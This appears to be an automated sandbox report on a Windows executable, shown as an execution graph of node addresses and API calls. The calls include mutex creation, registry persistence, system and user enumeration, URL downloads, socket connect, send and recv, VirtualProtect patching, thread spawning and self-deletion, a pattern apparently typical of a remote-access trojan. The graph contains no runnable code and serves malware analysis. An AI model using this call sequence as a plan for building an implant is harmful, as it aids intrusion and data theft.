                                                                                                                    • Instruction Fuzzy Hash: FE0126F0B093854FD73A62AC18206666FB69FC2A10F1A84EBC490CF396ED158C05C3A6

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:4.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                    Signature Coverage:6.2%
                                                                                                                    Total number of Nodes:1611
                                                                                                                    Total number of Limit Nodes:60
                                                                                                                    execution_graph 52497 41d4e0 52498 41d4f6 ctype ___scrt_fastfail 52497->52498 52500 431fa9 21 API calls 52498->52500 52512 41d6f3 52498->52512 52502 41d6a6 ___scrt_fastfail 52500->52502 52501 41d704 52503 41d744 52501->52503 52504 41d770 52501->52504 52514 431fa9 52501->52514 52502->52503 52507 431fa9 21 API calls 52502->52507 52504->52503 52522 41d484 21 API calls ___scrt_fastfail 52504->52522 52509 41d6ce ___scrt_fastfail 52507->52509 52508 41d73d ___scrt_fastfail 52508->52503 52519 43265f 52508->52519 52509->52503 52511 431fa9 21 API calls 52509->52511 52511->52512 52512->52503 52513 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 52512->52513 52513->52501 52515 431fb3 52514->52515 52516 431fb7 52514->52516 52515->52508 52523 43a89c 52516->52523 52532 43257f 52519->52532 52521 432667 52521->52504 52522->52503 52528 446b0f _strftime 52523->52528 52524 446b4d 52531 445364 20 API calls _free 52524->52531 52526 446b38 RtlAllocateHeap 52527 431fbc 52526->52527 52526->52528 52527->52508 52528->52524 52528->52526 52530 442210 7 API calls 2 library calls 52528->52530 52530->52528 52531->52527 52533 432598 52532->52533 52537 43258e 52532->52537 52534 431fa9 21 API calls 52533->52534 52533->52537 52535 4325b9 52534->52535 52535->52537 52538 43294a CryptAcquireContextA 52535->52538 52537->52521 52539 43296b CryptGenRandom 52538->52539 52541 432966 52538->52541 52540 432980 CryptReleaseContext 52539->52540 52539->52541 52540->52541 52541->52537 52542 426040 52547 426107 recv 52542->52547 52548 4260a1 52553 42611e send 52548->52553 52554 425e66 52555 425e7b 52554->52555 52558 425f1b 52554->52558 52556 425f35 52555->52556 52557 425f6a 52555->52557 52555->52558 52559 425ec9 52555->52559 52560 425f87 52555->52560 52561 425fae 52555->52561 52567 425efe 52555->52567 52582 424364 48 API calls ctype 52555->52582 52556->52557 52556->52558 52585 41f085 52 API calls 52556->52585 52557->52560 52586 424b8b 21 API calls 52557->52586 52559->52558 52559->52567 52583 41f085 52 API calls 52559->52583 52560->52558 52560->52561 52570 424f88 52560->52570 52561->52558 52587 4255d7 28 API calls 52561->52587 52567->52556 52567->52558 52584 424364 48 API calls ctype 52567->52584 52572 424fa7 ___scrt_fastfail 52570->52572 52571 424fbb 52578 424fc4 52571->52578 52579 424fdb 52571->52579 52590 41cf7e 48 API calls 52571->52590 52574 424fb6 52572->52574 52572->52579 52588 41e0a7 21 API calls 52572->52588 52574->52571 52574->52579 52589 41fae4 45 API calls 52574->52589 52577 42505e 52577->52579 52581 431fa9 21 API calls 52577->52581 52578->52579 52591 424195 21 API calls 2 library calls 52578->52591 52579->52561 52581->52571 52582->52559 52583->52559 52584->52556 52585->52556 52586->52560 52587->52558 52588->52574 52589->52577 52590->52578 52591->52579 52592 1000c7a7 52593 1000c7be 52592->52593 52597 1000c82c 52592->52597 52593->52597 52604 1000c7e6 GetModuleHandleA 52593->52604 52594 1000c872 52595 1000c835 GetModuleHandleA 52598 1000c83f 52595->52598 52597->52594 52597->52595 52597->52598 52598->52597 52599 1000c85f GetProcAddress 52598->52599 52599->52597 52600 1000c7dd 52600->52597 52600->52598 52601 1000c800 GetProcAddress 52600->52601 52601->52597 52602 1000c80d VirtualProtect 52601->52602 52602->52597 52603 1000c81c VirtualProtect 52602->52603 52603->52597 52605 1000c7ef 52604->52605 52612 1000c82c 52604->52612 52616 1000c803 GetProcAddress 52605->52616 52607 1000c872 52608 1000c835 GetModuleHandleA 52614 1000c83f 52608->52614 52609 1000c7f4 52610 1000c800 GetProcAddress 52609->52610 52609->52612 52611 1000c80d VirtualProtect 52610->52611 52610->52612 52611->52612 52613 1000c81c VirtualProtect 52611->52613 52612->52607 52612->52608 52612->52614 52613->52612 52614->52612 52615 1000c85f GetProcAddress 52614->52615 52615->52612 52617 1000c82c 52616->52617 52618 1000c80d VirtualProtect 52616->52618 52620 1000c872 52617->52620 52621 1000c835 GetModuleHandleA 52617->52621 52618->52617 52619 1000c81c VirtualProtect 52618->52619 52619->52617 52622 1000c83f 52621->52622 52622->52617 52622->52622 52623 1000c85f GetProcAddress 52622->52623 52623->52622 52624 43a9a8 52627 43a9b4 _swprintf BuildCatchObjectHelperInternal 52624->52627 52625 43a9c2 52640 445364 20 API calls _free 52625->52640 52627->52625 52628 43a9ec 52627->52628 52635 444adc EnterCriticalSection 52628->52635 52630 43a9f7 52636 43aa98 52630->52636 52632 43a9c7 std::_Locinfo::_Locinfo_dtor ___std_exception_copy 52635->52630 52638 43aaa6 52636->52638 52637 43aa02 52641 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 52637->52641 52638->52637 52642 448426 36 API calls 2 library calls 52638->52642 52640->52632 52641->52632 52642->52638 52643 414dba 52658 41a52b 52643->52658 52645 414dc3 52668 401fbd 52645->52668 52650 4161f2 52691 401d8c 52650->52691 52653 4161fb 52654 401eea 11 API calls 52653->52654 52655 416207 52654->52655 52656 401eea 11 API calls 52655->52656 52657 416213 52656->52657 52659 41a539 52658->52659 52660 43a89c _Yarn 21 API calls 52659->52660 52661 41a543 InternetOpenW InternetOpenUrlW 52660->52661 52662 41a56c InternetReadFile 52661->52662 52666 41a58f 52662->52666 52663 41a5bc InternetCloseHandle InternetCloseHandle 52665 41a5ce 52663->52665 52665->52645 52666->52662 52666->52663 52667 401eea 11 API calls 52666->52667 52697 401f86 52666->52697 52667->52666 52669 401fcc 52668->52669 52706 402501 52669->52706 52671 401fea 52672 404468 52671->52672 52673 40447b 52672->52673 52711 404be8 52673->52711 52675 404490 ctype 52676 404507 WaitForSingleObject 52675->52676 52677 4044e7 52675->52677 52678 40451d 52676->52678 52679 4044f9 send 52677->52679 52715 42052a 54 API calls 52678->52715 52680 404542 52679->52680 52683 401eea 11 API calls 52680->52683 52682 404530 SetEvent 52682->52680 52684 40454a 52683->52684 52685 401eea 11 API calls 52684->52685 52686 404552 52685->52686 52686->52650 52687 401eea 52686->52687 52688 4021b9 52687->52688 52689 4021e8 52688->52689 52721 40262e 52688->52721 52689->52650 52692 40200a 52691->52692 52696 40203a 52692->52696 52729 402654 52692->52729 52694 40202b 52732 4026ba 11 API calls _Deallocate 52694->52732 52696->52653 52698 401f8e 52697->52698 52701 402325 52698->52701 52700 401fa4 52700->52666 52702 40232f 52701->52702 52704 40233a 52702->52704 52705 40294a 28 API calls 52702->52705 52704->52700 52705->52704 52707 40250d 52706->52707 52709 40252b 52707->52709 52710 40261a 28 API calls 52707->52710 52709->52671 52710->52709 52712 404bf0 52711->52712 52716 404c0c 52712->52716 52714 404c06 52714->52675 52715->52682 52717 404c16 52716->52717 52719 404c21 52717->52719 52720 404d07 28 API calls 52717->52720 52719->52714 52720->52719 52724 402bee 52721->52724 52723 40263b 52723->52689 52725 402bfb 52724->52725 52727 402c08 std::ios_base::_Tidy 52724->52727 52728 4015d8 11 API calls __Getctype 52725->52728 52727->52723 52728->52727 52733 402c1a 52729->52733 52732->52696 52736 403340 52733->52736 52738 403348 52736->52738 52737 402662 52737->52694 52738->52737 52740 4038c2 52738->52740 52743 4038cb 52740->52743 52744 401eea 11 API calls 52743->52744 52745 4038ca 52744->52745 52745->52738 52746 42ea2e 52747 42ea39 52746->52747 52748 42ea4d 52747->52748 52750 431fd3 52747->52750 52751 431fe2 52750->52751 52753 431fde 52750->52753 52754 43fcea 52751->52754 52753->52748 52755 44b9ce 52754->52755 52756 44b9e6 52755->52756 52757 44b9db 52755->52757 52759 44b9f7 _strftime 52756->52759 52760 44b9ee 52756->52760 52767 446b0f 52757->52767 52762 44ba21 HeapReAlloc 52759->52762 52763 44b9fc 52759->52763 52781 442210 7 API calls 2 library calls 52759->52781 52774 446ad5 52760->52774 52762->52759 52764 44b9e3 52762->52764 52780 445364 20 API calls _free 52763->52780 52764->52753 52768 446b4d 52767->52768 52773 446b1d _strftime 52767->52773 52783 445364 20 API calls _free 52768->52783 52770 446b38 RtlAllocateHeap 52771 446b4b 52770->52771 52770->52773 52771->52764 52773->52768 52773->52770 52782 442210 7 API calls 2 library calls 52773->52782 52775 446ae0 RtlFreeHeap 52774->52775 52776 446b09 _free 52774->52776 52775->52776 52777 446af5 52775->52777 52776->52764 52784 445364 20 API calls _free 52777->52784 52779 446afb GetLastError 52779->52776 52780->52764 52781->52759 52782->52773 52783->52771 52784->52779 52785 402bcc 52786 402bd7 52785->52786 52787 402bdf 52785->52787 52793 403315 52786->52793 52789 402beb 52787->52789 52800 4015d3 52787->52800 52794 4015d3 22 API calls 52793->52794 52795 40332a 52794->52795 52796 402bdd 52795->52796 52797 40333b 52795->52797 52810 43a864 11 API calls _Atexit 52797->52810 52799 43a863 52802 43361d 52800->52802 52801 43a89c _Yarn 21 API calls 52801->52802 52802->52801 52803 402be9 52802->52803 52806 43363e std::_Facet_Register 52802->52806 52811 442210 7 API calls 2 library calls 52802->52811 52805 433dfc std::_Facet_Register 52813 437be7 RaiseException 52805->52813 52806->52805 52812 437be7 RaiseException 52806->52812 52809 433e19 52810->52799 52811->52802 52812->52805 52813->52809 52814 4339ce 52815 4339da BuildCatchObjectHelperInternal 52814->52815 52846 4336c3 52815->52846 52817 4339e1 52818 433b34 52817->52818 52821 433a0b 52817->52821 53146 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 52818->53146 52820 433b3b 53147 4426ce 28 API calls _Atexit 52820->53147 52828 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 52821->52828 53140 4434e1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 52821->53140 52823 433b41 53148 442680 28 API calls _Atexit 52823->53148 52826 433a24 52829 433a2a 52826->52829 53141 443485 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 52826->53141 52827 433b49 52831 433aab 52828->52831 53142 43ee04 35 API calls 4 library calls 52828->53142 52857 433c6e 52831->52857 52840 433acd 52840->52820 52841 433ad1 52840->52841 52842 433ada 52841->52842 53144 442671 28 API calls _Atexit 52841->53144 53145 433852 13 API calls 2 library calls 52842->53145 52845 433ae2 52845->52829 52847 4336cc 52846->52847 53149 433e1a IsProcessorFeaturePresent 52847->53149 52849 4336d8 53150 4379fe 10 API calls 3 library calls 52849->53150 52851 4336dd 52852 4336e1 52851->52852 53151 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52851->53151 52852->52817 52854 4336ea 52855 4336f8 52854->52855 53152 437a27 8 API calls 3 library calls 52854->53152 52855->52817 53153 436060 52857->53153 52860 433ab1 52861 443432 52860->52861 53155 44ddd9 52861->53155 52863 44343b 52864 433aba 52863->52864 53159 44e0e3 35 API calls 52863->53159 52866 40d767 52864->52866 53161 41bcf3 LoadLibraryA GetProcAddress 52866->53161 52868 40d783 GetModuleFileNameW 53166 40e168 52868->53166 52870 40d79f 52871 401fbd 28 API calls 52870->52871 52872 40d7ae 52871->52872 52873 401fbd 28 API calls 52872->52873 52874 40d7bd 52873->52874 53181 41afd3 52874->53181 52878 40d7cf 52879 401d8c 11 API calls 52878->52879 52880 40d7d8 52879->52880 52881 40d835 52880->52881 52882 40d7eb 52880->52882 53206 401d64 52881->53206 53450 40e986 111 API calls 52882->53450 52885 40d845 52888 401d64 28 API calls 52885->52888 52886 40d7fd 52887 401d64 28 API calls 52886->52887 52891 40d809 52887->52891 52889 40d864 52888->52889 53211 404cbf 52889->53211 53451 40e937 65 API calls 52891->53451 52892 40d873 53215 405ce6 52892->53215 52895 40d87f 53218 401eef 52895->53218 52896 40d824 53452 40e155 65 API calls 52896->53452 52899 40d88b 52900 401eea 11 API calls 52899->52900 52902 40d894 52900->52902 52901 401eea 11 API calls 52904 40dc9f 52901->52904 52903 401eea 11 API calls 52902->52903 52905 40d89d 52903->52905 53143 433ca4 GetModuleHandleW 52904->53143 52906 401d64 28 API calls 52905->52906 52907 40d8a6 52906->52907 53222 401ebd 52907->53222 52909 40d8b1 52910 401d64 28 API calls 52909->52910 52911 40d8ca 52910->52911 52912 401d64 28 API calls 52911->52912 52914 40d8e5 52912->52914 52913 40d946 52916 401d64 28 API calls 52913->52916 52931 40e134 52913->52931 52914->52913 53453 4085b4 52914->53453 52921 40d95d 52916->52921 52917 40d912 52918 401eef 11 API calls 52917->52918 52919 40d91e 52918->52919 52922 401eea 11 API calls 52919->52922 52920 40d9a4 53226 40bed7 52920->53226 52921->52920 52926 4124b7 3 API calls 52921->52926 52923 40d927 52922->52923 53457 4124b7 RegOpenKeyExA 52923->53457 52925 40d9aa 52927 40d82d 52925->52927 53229 41a473 52925->53229 52932 40d988 52926->52932 52927->52901 52930 40d9c5 52933 40da18 52930->52933 53246 40697b 52930->53246 53545 412902 30 API calls 52931->53545 52932->52920 53460 412902 30 API calls 52932->53460 52935 401d64 28 API calls 52933->52935 52938 40da21 52935->52938 52947 40da32 52938->52947 52948 40da2d 52938->52948 52940 40e14a 53546 4112b5 64 API calls ___scrt_fastfail 52940->53546 52941 40d9e4 53461 40699d 30 API calls 52941->53461 52942 40d9ee 52944 401d64 28 API calls 52942->52944 52955 40d9f7 52944->52955 52950 401d64 28 API calls 52947->52950 53464 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 52948->53464 52949 40d9e9 53462 4064d0 97 API calls 52949->53462 52953 40da3b 52950->52953 53250 41ae18 52953->53250 52955->52933 52958 40da13 52955->52958 52956 40da46 53254 401e18 52956->53254 53463 4064d0 97 API calls 52958->53463 52959 40da51 53258 401e13 52959->53258 52962 40da5a 52963 401d64 28 API calls 52962->52963 52964 40da63 52963->52964 52965 401d64 28 API calls 52964->52965 52966 40da7d 52965->52966 52967 401d64 28 API calls 52966->52967 52968 40da97 52967->52968 52969 401d64 28 API calls 52968->52969 52970 40dab0 52969->52970 52971 401d64 28 API calls 52970->52971 53002 40db1d 52970->53002 52976 40dac5 _wcslen 52971->52976 52972 40db2c 52973 40db35 52972->52973 52999 40dbb1 ___scrt_fastfail 52972->52999 52974 401d64 28 API calls 52973->52974 52975 40db3e 52974->52975 52977 401d64 28 API calls 52975->52977 52979 401d64 28 API calls 52976->52979 52976->53002 52980 40db50 52977->52980 52978 40dcaa ___scrt_fastfail 53524 41265d RegOpenKeyExA 52978->53524 52981 40dae0 52979->52981 52983 401d64 28 API calls 52980->52983 52984 401d64 28 API calls 52981->52984 52985 40db62 52983->52985 52986 40daf5 52984->52986 52989 401d64 28 API calls 52985->52989 53465 40c89e 52986->53465 52987 40dcef 52988 401d64 28 API calls 52987->52988 52990 40dd16 52988->52990 52992 40db8b 52989->52992 53272 401f66 52990->53272 52995 401d64 28 API calls 52992->52995 52994 401e18 11 API calls 52997 40db14 52994->52997 53000 40db9c 52995->53000 52998 401e13 11 API calls 52997->52998 52998->53002 53262 4128a2 52999->53262 53522 40bc67 46 API calls _wcslen 53000->53522 53001 40dd25 53276 4126d2 RegCreateKeyA 53001->53276 53002->52972 53002->52978 53006 40dc45 ctype 53011 401d64 28 API calls 53006->53011 53007 40dbac 53007->52999 53009 401d64 28 API calls 53010 40dd47 53009->53010 53282 43a5f7 53010->53282 53012 40dc5c 53011->53012 53012->52987 53016 40dc70 53012->53016 53015 40dd5e 53527 41bec0 87 API calls ___scrt_fastfail 53015->53527 53018 401d64 28 API calls 53016->53018 53017 40dd81 53022 401f66 28 API calls 53017->53022 53020 40dc7e 53018->53020 53023 41ae18 28 API calls 53020->53023 53021 40dd65 CreateThread 53021->53017 54422 41c97f 10 API calls 53021->54422 53024 40dd96 53022->53024 53025 40dc87 53023->53025 53026 401f66 28 API calls 53024->53026 53523 40e219 119 API calls 53025->53523 53028 40dda5 53026->53028 53286 41a696 53028->53286 53029 40dc8c 53029->52987 53031 40dc93 53029->53031 53031->52927 53033 401d64 28 API calls 53034 40ddb6 53033->53034 53035 401d64 28 API calls 53034->53035 53036 40ddcb 53035->53036 53037 401d64 28 API calls 53036->53037 53038 40ddeb 53037->53038 53039 43a5f7 _strftime 39 API calls 53038->53039 53040 40ddf8 53039->53040 53041 401d64 28 API calls 53040->53041 53042 40de03 53041->53042 53043 401d64 28 API calls 53042->53043 53044 40de14 53043->53044 53045 401d64 28 API calls 53044->53045 53046 40de29 53045->53046 53047 401d64 28 API calls 53046->53047 53048 40de3a 53047->53048 53049 40de41 StrToIntA 53048->53049 53310 409517 53049->53310 53052 401d64 28 API calls 53053 40de5c 53052->53053 53054 40dea1 53053->53054 53055 40de68 53053->53055 53058 401d64 28 API calls 53054->53058 53528 43361d 22 API calls 3 library calls 53055->53528 53057 40de71 53059 401d64 28 API calls 53057->53059 53060 40deb1 53058->53060 53061 40de84 53059->53061 53062 40def9 53060->53062 53063 40debd 53060->53063 53064 40de8b CreateThread 53061->53064 53066 401d64 28 API calls 53062->53066 53529 43361d 22 API calls 3 library calls 53063->53529 53064->53054 54420 419138 112 API calls 2 library calls 53064->54420 53068 40df02 53066->53068 53067 40dec6 53069 401d64 28 API calls 53067->53069 53071 40df6c 53068->53071 53072 40df0e 53068->53072 53070 40ded8 53069->53070 53073 40dedf CreateThread 53070->53073 53074 401d64 28 API calls 53071->53074 53075 401d64 28 API calls 53072->53075 53073->53062 54419 419138 112 API calls 2 library calls 53073->54419 53076 40df75 53074->53076 53077 40df1e 53075->53077 53078 40df81 53076->53078 53079 40dfba 53076->53079 53080 401d64 28 API calls 53077->53080 53081 401d64 28 API calls 53078->53081 53335 41a7b2 GetComputerNameExW GetUserNameW 53079->53335 53082 40df33 53080->53082 53084 40df8a 53081->53084 53530 40c854 53082->53530 53090 401d64 28 API calls 53084->53090 53086 401e18 11 API calls 53087 40dfce 53086->53087 53089 401e13 11 API calls 53087->53089 53092 40dfd7 53089->53092 53093 40df9f 53090->53093 53095 40dfe0 SetProcessDEPPolicy 53092->53095 53096 40dfe3 CreateThread 53092->53096 53103 43a5f7 _strftime 39 API calls 53093->53103 53094 401e18 11 API calls 53097 40df52 53094->53097 53095->53096 53098 40e004 53096->53098 53099 40dff8 CreateThread 53096->53099 54391 40e54f 53096->54391 53100 401e13 11 API calls 53097->53100 53101 40e019 53098->53101 53102 40e00d CreateThread 53098->53102 53099->53098 54421 410f36 146 API calls 53099->54421 53104 40df5b CreateThread 53100->53104 53106 40e073 53101->53106 53108 401f66 28 API calls 53101->53108 53102->53101 54423 411524 38 API calls ___scrt_fastfail 53102->54423 53105 40dfac 53103->53105 53104->53071 54418 40196b 49 API calls _strftime 53104->54418 53541 40b95c 7 API calls 53105->53541 53346 41246e RegOpenKeyExA 53106->53346 53109 40e046 53108->53109 53542 404c9e 28 API calls 53109->53542 53112 40e053 53114 401f66 28 API calls 53112->53114 53116 40e062 53114->53116 53115 40e12a 53358 40cbac 53115->53358 53119 41a696 79 API calls 53116->53119 53118 41ae18 28 API calls 53121 40e0a4 53118->53121 53122 40e067 53119->53122 53349 412584 RegOpenKeyExW 53121->53349 53124 401eea 11 API calls 53122->53124 53124->53106 53127 401e13 11 API calls 53130 40e0c5 53127->53130 53128 40e0ed DeleteFileW 53129 40e0f4 53128->53129 53128->53130 53132 41ae18 28 API calls 53129->53132 53130->53128 53130->53129 53131 40e0db Sleep 53130->53131 53543 401e07 53131->53543 53134 40e104 53132->53134 53354 41297a RegOpenKeyExW 53134->53354 53136 40e117 53137 401e13 11 API calls 53136->53137 53138 40e121 53137->53138 53139 401e13 11 API calls 53138->53139 53139->53115 53140->52826 53141->52828 53142->52831 53143->52840 53144->52842 53145->52845 53146->52820 53147->52823 53148->52827 53149->52849 53150->52851 53151->52854 53152->52852 53154 433c81 GetStartupInfoW 53153->53154 53154->52860 53156 44ddeb 53155->53156 53157 44dde2 53155->53157 53156->52863 53160 44dcd8 48 API calls 4 library calls 53157->53160 53159->52863 53160->53156 53162 41bd32 LoadLibraryA GetProcAddress 53161->53162 53163 41bd22 GetModuleHandleA GetProcAddress 53161->53163 53164 41bd5b 32 API calls 53162->53164 53165 41bd4b LoadLibraryA GetProcAddress 53162->53165 53163->53162 53164->52868 53165->53164 53547 41a64f FindResourceA 53166->53547 53169 43a89c _Yarn 21 API calls 53170 40e192 ctype 53169->53170 53171 401f86 28 API calls 53170->53171 53172 40e1ad 53171->53172 53173 401eef 11 API calls 53172->53173 53174 40e1b8 53173->53174 53175 401eea 11 API calls 53174->53175 53176 40e1c1 53175->53176 53177 43a89c _Yarn 21 API calls 53176->53177 53178 40e1d2 ctype 53177->53178 53550 406052 53178->53550 53180 40e205 53180->52870 53201 41afe6 53181->53201 53182 41b056 53183 401eea 11 API calls 53182->53183 53184 41b088 53183->53184 53185 401eea 11 API calls 53184->53185 53187 41b090 53185->53187 53186 41b058 53188 403b60 28 API calls 53186->53188 53190 401eea 11 API calls 53187->53190 53191 41b064 53188->53191 53193 40d7c6 53190->53193 53194 401eef 11 API calls 53191->53194 53192 401eef 11 API calls 53192->53201 53202 40e8bd 53193->53202 53195 41b06d 53194->53195 53196 401eea 11 API calls 53195->53196 53198 41b075 53196->53198 53197 401eea 11 API calls 53197->53201 53557 41bfb9 28 API calls 53198->53557 53201->53182 53201->53186 53201->53192 53201->53197 53553 403b60 53201->53553 53556 41bfb9 28 API calls 53201->53556 53203 40e8ca 53202->53203 53205 40e8da 53203->53205 53574 40200a 11 API calls 53203->53574 53205->52878 53207 401d6c 53206->53207 53208 401d74 53207->53208 53575 401fff 28 API calls 53207->53575 53208->52885 53210 401d8b 53212 404ccb 53211->53212 53576 402e78 53212->53576 53214 404cee 53214->52892 53585 404bc4 53215->53585 53217 405cf4 53217->52895 53219 401efe 53218->53219 53221 401f0a 53219->53221 53594 4021b9 53219->53594 53221->52899 53224 401ec9 53222->53224 53223 401ee4 53223->52909 53224->53223 53225 402325 28 API calls 53224->53225 53225->53223 53598 401e8f 53226->53598 53228 40bee1 CreateMutexA GetLastError 53228->52925 53600 41b16b 53229->53600 53231 41a481 53604 412513 RegOpenKeyExA 53231->53604 53234 401eef 11 API calls 53235 41a4af 53234->53235 53236 401eea 11 API calls 53235->53236 53237 41a4b7 53236->53237 53238 41a50a 53237->53238 53239 412513 31 API calls 53237->53239 53238->52930 53240 41a4dd 53239->53240 53241 41a4e8 StrToIntA 53240->53241 53242 41a4ff 53241->53242 53243 41a4f6 53241->53243 53244 401eea 11 API calls 53242->53244 53609 41c112 22 API calls 53243->53609 53244->53238 53247 40698f 53246->53247 53248 4124b7 3 API calls 53247->53248 53249 406996 53248->53249 53249->52941 53249->52942 53251 41ae2c 53250->53251 53610 40b027 53251->53610 53253 41ae34 53253->52956 53255 401e27 53254->53255 53257 401e33 53255->53257 53619 402121 11 API calls 53255->53619 53257->52959 53260 402121 53258->53260 53259 402150 53259->52962 53260->53259 53620 402718 11 API calls _Deallocate 53260->53620 53263 4128c0 53262->53263 53264 406052 28 API calls 53263->53264 53265 4128d5 53264->53265 53266 401fbd 28 API calls 53265->53266 53267 4128e5 53266->53267 53268 4126d2 14 API calls 53267->53268 53269 4128ef 53268->53269 53270 401eea 11 API calls 53269->53270 53271 4128fc 53270->53271 53271->53006 53273 401f6e 53272->53273 53621 402301 53273->53621 53277 412722 53276->53277 53279 4126eb 53276->53279 53278 401eea 11 API calls 53277->53278 53280 40dd3b 53278->53280 53281 4126fd RegSetValueExA RegCloseKey 53279->53281 53280->53009 53281->53277 53283 43a610 _strftime 53282->53283 53625 43994e 53283->53625 53285 40dd54 53285->53015 53285->53017 53287 41a747 53286->53287 53288 41a6ac GetLocalTime 53286->53288 53290 401eea 11 API calls 53287->53290 53289 404cbf 28 API calls 53288->53289 53291 41a6ee 53289->53291 53292 41a74f 53290->53292 53294 405ce6 28 API calls 53291->53294 53293 401eea 11 API calls 53292->53293 53295 40ddaa 53293->53295 53296 41a6fa 53294->53296 53295->53033 53653 4027cb 53296->53653 53298 41a706 53299 405ce6 28 API calls 53298->53299 53300 41a712 53299->53300 53656 406478 76 API calls 53300->53656 53302 41a720 53303 401eea 11 API calls 53302->53303 53304 41a72c 53303->53304 53305 401eea 11 API calls 53304->53305 53306 41a735 53305->53306 53307 401eea 11 API calls 53306->53307 53308 41a73e 53307->53308 53309 401eea 11 API calls 53308->53309 53309->53287 53311 409536 _wcslen 53310->53311 53312 409541 53311->53312 53313 409558 53311->53313 53314 40c89e 32 API calls 53312->53314 53315 40c89e 32 API calls 53313->53315 53316 409549 53314->53316 53317 409560 53315->53317 53318 401e18 11 API calls 53316->53318 53319 401e18 11 API calls 53317->53319 53334 409553 53318->53334 53320 40956e 53319->53320 53321 401e13 11 API calls 53320->53321 53323 409576 53321->53323 53322 401e13 11 API calls 53324 4095ad 53322->53324 53676 40856b 28 API calls 53323->53676 53661 409837 53324->53661 53327 409588 53677 4028cf 53327->53677 53330 409593 53331 401e18 11 API calls 53330->53331 53332 40959d 53331->53332 53333 401e13 11 API calls 53332->53333 53333->53334 53334->53322 53703 403b40 53335->53703 53339 41a80d 53340 4028cf 28 API calls 53339->53340 53341 41a817 53340->53341 53342 401e13 11 API calls 53341->53342 53343 41a820 53342->53343 53344 401e13 11 API calls 53343->53344 53345 40dfc3 53344->53345 53345->53086 53347 40e08b 53346->53347 53348 41248f RegQueryValueExA RegCloseKey 53346->53348 53347->53115 53347->53118 53348->53347 53350 4125b0 RegQueryValueExW RegCloseKey 53349->53350 53351 4125dd 53349->53351 53350->53351 53352 403b40 28 API calls 53351->53352 53353 40e0ba 53352->53353 53353->53127 53355 412992 RegDeleteValueW 53354->53355 53356 4129a6 53354->53356 53355->53356 53357 4129a2 53355->53357 53356->53136 53357->53136 53359 40cbc5 53358->53359 53360 41246e 3 API calls 53359->53360 53361 40cbcc 53360->53361 53365 40cbeb 53361->53365 53730 401602 53361->53730 53363 40cbd9 53733 4127d5 RegCreateKeyA 53363->53733 53366 413fd4 53365->53366 53367 413feb 53366->53367 53747 41aa83 53367->53747 53369 413ff6 53370 401d64 28 API calls 53369->53370 53371 41400f 53370->53371 53372 43a5f7 _strftime 39 API calls 53371->53372 53373 41401c 53372->53373 53374 414021 Sleep 53373->53374 53375 41402e 53373->53375 53374->53375 53376 401f66 28 API calls 53375->53376 53377 41403d 53376->53377 53378 401d64 28 API calls 53377->53378 53379 41404b 53378->53379 53380 401fbd 28 API calls 53379->53380 53381 414053 53380->53381 53382 41afd3 28 API calls 53381->53382 53383 41405b 53382->53383 53751 404262 WSAStartup 53383->53751 53385 414065 53386 401d64 28 API calls 53385->53386 53387 41406e 53386->53387 53388 401d64 28 API calls 53387->53388 53444 4140ed 53387->53444 53389 414087 53388->53389 53390 401d64 28 API calls 53389->53390 53391 414098 53390->53391 53394 401d64 28 API calls 53391->53394 53392 41afd3 28 API calls 53392->53444 53393 401d64 28 API calls 53393->53444 53395 4140a9 53394->53395 53397 401d64 28 API calls 53395->53397 53396 4085b4 28 API calls 53396->53444 53398 4140ba 53397->53398 53399 401d64 28 API calls 53398->53399 53401 4140cb 53399->53401 53400 401eef 11 API calls 53400->53444 53402 401d64 28 API calls 53401->53402 53403 4140dd 53402->53403 53872 404101 88 API calls 53403->53872 53405 41a696 79 API calls 53405->53444 53407 414244 WSAGetLastError 53873 41bc86 30 API calls 53407->53873 53412 401f66 28 API calls 53412->53444 53415 404cbf 28 API calls 53415->53444 53416 401d8c 11 API calls 53416->53444 53417 401d64 28 API calls 53418 414ae4 53417->53418 53418->53417 53419 43a5f7 _strftime 39 API calls 53418->53419 53894 40a767 84 API calls 53418->53894 53420 414b80 Sleep 53419->53420 53420->53444 53421 405ce6 28 API calls 53421->53444 53424 4082dc 28 API calls 53424->53444 53426 401fbd 28 API calls 53426->53444 53427 41265d 3 API calls 53427->53444 53428 412513 31 API calls 53428->53444 53429 403b40 28 API calls 53429->53444 53432 401d64 28 API calls 53433 4144ed GetTickCount 53432->53433 53858 41ad56 53433->53858 53436 41ad56 28 API calls 53436->53444 53438 41aed8 28 API calls 53438->53444 53441 4027cb 28 API calls 53441->53444 53442 40275c 28 API calls 53442->53444 53443 404468 61 API calls 53443->53444 53444->53392 53444->53393 53444->53396 53444->53400 53444->53405 53444->53407 53444->53412 53444->53415 53444->53416 53444->53418 53444->53421 53444->53424 53444->53426 53444->53427 53444->53428 53444->53429 53444->53432 53444->53436 53444->53438 53444->53441 53444->53442 53444->53443 53445 401eea 11 API calls 53444->53445 53446 401e13 11 API calls 53444->53446 53449 414b22 CreateThread 53444->53449 53752 413f9a 53444->53752 53757 4041f1 53444->53757 53764 404915 53444->53764 53779 40428c connect 53444->53779 53839 41a97d 53444->53839 53842 413683 53444->53842 53845 440c61 53444->53845 53849 40cbf1 53444->53849 53855 41adfe 53444->53855 53863 41acb0 GetLastInputInfo GetTickCount 53444->53863 53864 41ac62 53444->53864 53869 40e679 GetLocaleInfoA 53444->53869 53874 404c9e 28 API calls 53444->53874 53875 4027ec 53444->53875 53879 4045d5 53444->53879 53895 4047eb WaitForSingleObject 53444->53895 53445->53444 53446->53444 53449->53444 54373 419e99 105 API calls 53449->54373 53450->52886 53451->52896 53454 4085c0 53453->53454 53455 402e78 28 API calls 53454->53455 53456 4085e4 53455->53456 53456->52917 53458 4124e1 RegQueryValueExA RegCloseKey 53457->53458 53459 41250b 53457->53459 53458->53459 53459->52913 53460->52920 53461->52949 53462->52942 53463->52933 53464->52947 53466 40c8ba 53465->53466 53467 40c8da 53466->53467 53468 40c90f 53466->53468 